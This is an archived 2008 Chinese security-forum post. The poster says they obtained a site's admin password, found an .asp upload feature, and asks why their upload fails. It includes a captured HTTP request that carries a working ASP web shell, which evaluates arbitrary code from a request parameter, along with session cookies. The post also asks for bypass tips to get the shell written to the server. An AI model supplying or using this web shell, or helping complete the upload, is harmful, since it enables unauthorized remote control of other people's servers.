【3.A.S.T】网络安全爱好者's Archiver

黑客学习

jjcd 发表于 2008-7-25 13:53

[讨论]后台可上传.asp文件,但是写入失败.?

[讨论]后台可上传.asp文件,但是写入失败.?
译文作者:miao2
好不容易得到了后台密码,进去后发现可传.asp文件,一下笑了. :-)
但是上传时提示写入失败




ADODB.Stream 错误 '800a0bbc'

写入文件失败。

这是抓包内容:






POST /admin/upload_asp.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: [url=http://www.xxxxx.com/admin/upload_aspform.asp]http://www.xxxxx.com/admin/upload_aspform.asp[/url]
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d78c2931029c

Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: [url=http://www.xxxxx.com/]www.xxxxx.com[/url]
Content-Length: 761
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTTSDDQ=PPNMLHJDIKINOAIMEOAHHPDH; xoYuStudioUserDj=4; xoYuStudioUserName=admin

-----------------------------7d74e3031029c
Content-Disposition: form-data; name="filepath"

../uploadasp/
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="act"

upload
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="file"; filename="C:\Documents and Settings\et\桌面\eval.asp"
Content-Type: text/plain

<%
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""a""))")
%>

-----------------------------7d74e3031029c
Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d74e3031029c--



尝试过修改路径,加空格的方法上传,但是还是不能成功.请高手指教?
[url=http://wpa.qq.com/msgrd?V=1&Uin=308449635&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子26 精华[url=http://forum.eviloctal.com/digest.php?authorid=133110]2[/url] 积分110 阅读权限40 性别男 在线时间102 小时 注册时间2007-7-28 最后登录2008-7-24 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133110]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日,预测咨询,公司改名,权威易经[/url]

[url=http://forum.eviloctal.com/space-uid-58901.html]yoyful[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male3.gif[/img]
晶莹剔透§烈日灼然

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.